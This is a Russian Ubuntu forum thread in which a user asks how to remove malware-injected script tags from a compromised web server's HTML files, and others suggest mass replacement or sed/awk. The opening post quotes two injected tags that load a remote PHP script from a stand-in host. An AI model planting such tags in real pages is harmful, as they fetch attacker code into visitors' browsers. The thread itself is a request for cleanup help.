Форум русскоязычного сообщества Ubuntu


Хотите сделать посильный вклад в развитие Ubuntu и русскоязычного сообщества?
Помогите нам с документацией!

Автор Тема: Вирус на веб-сервере  (Прочитано 625 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Kolunt

  • Автор темы
  • Новичок
  • *
  • Сообщений: 1
    • Просмотр профиля
Вирус на веб-сервере
« : 12 Декабрь 2014, 23:23:16 »
Есть сервер Убунтовский (12,04).
На нём поднят веб-сервер и заведен с десяток сайтов.
Конфигурация по моему мнению не столь важна, так как проблема в следующем.
Один из сайтов разделён на разделы, что по структуре просто выглядит как папки.

primer.ru/razdel1
primer.ru/razdel2
primer.ru/razdel3

Ввиду того, что на этом сайте в админке в какой-то момент вышел из строя файловый менеджер, а прошлому веб-разработчику было вломак его чинить, он просто поднял на нём ФТП и раздал всем логины/пароли с правами на определённые разделы. Ну чтобы они картинки могли заливать.

Один из юзверей где-то засветил пароль и через него в один из разделов, на который был full control влез вирус. Пароль, да и имя естесственно сразу поменяли.
 Сразу - это как только пользователи обнаружили, что Яндекс блокирует переходы из поисковика. Т.е. первую неделю они думали, что само пройдёт. Вторую, они вспоминали мой емэйл. Третью формулировали предложение. Ну в общем через месяц.
 Суть cms-ки в том, что она в зависимости от раздела просто генерирует файлики *.html. И вирус почти в каждый этот файлик вписал следующий код:

Пример №1. <!--cf774c--><script type="text/javascript" src="http://domenvirusa.ru/crbjfywb.php?id=3416307"></script><!--/cf774c-->
Пример №2. <!--ed14b7--><script type="text/javascript" src="http://domenvirusa.ru/crbjfywb.php?id=3417946"></script><!--/ed14b7-->

Как видно, выделенные жирным части кода меняются. Могу ошибаться, но вроде ещё встречал разные названия пхп-файлов.

Итак, вопрос  :D
Как можно быстро почистить эту хрень?

Есть доступ как по SSH так и по FTP с правами Full Control.
Но вручную я уже слегка одурел это делать.

Оффлайн graddata

  • PreSale
  • Администратор
  • Старожил
  • *
  • Сообщений: 1808
  • BIGCloud
    • Просмотр профиля
Re: Вирус на веб-сервере
« Ответ #1 : 13 Декабрь 2014, 01:12:06 »
в Notepad++ открываете все файлы и производите массовую замену.

Оффлайн graddata

  • PreSale
  • Администратор
  • Старожил
  • *
  • Сообщений: 1808
  • BIGCloud
    • Просмотр профиля
Re: Вирус на веб-сервере
« Ответ #2 : 13 Декабрь 2014, 01:17:08 »
http://linuxforum.ru/viewtopic.php?pid=407311

выбирайте сами решение


Оффлайн fisher74

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 13749
    • Просмотр профиля
Re: Вирус на веб-сервере
« Ответ #4 : 13 Декабрь 2014, 08:47:37 »
Вообще-то нужно удалять дописанный тег, а не производить рекурсивную замену одного слова.
Тут несколько сложнее. Я не силён в awk, но но думаю оно то что надо. Искать строки с "http://domenvirusa.ru/crbjfywb.php", отыскивать рядом границы тега и удалять. Можно sed пробовать.
Принимаю благодарности в WMR и WMZ на кошельки:
R158160676909 и Z313280060764

 

Страница сгенерирована за 0.168 секунд. Запросов: 24.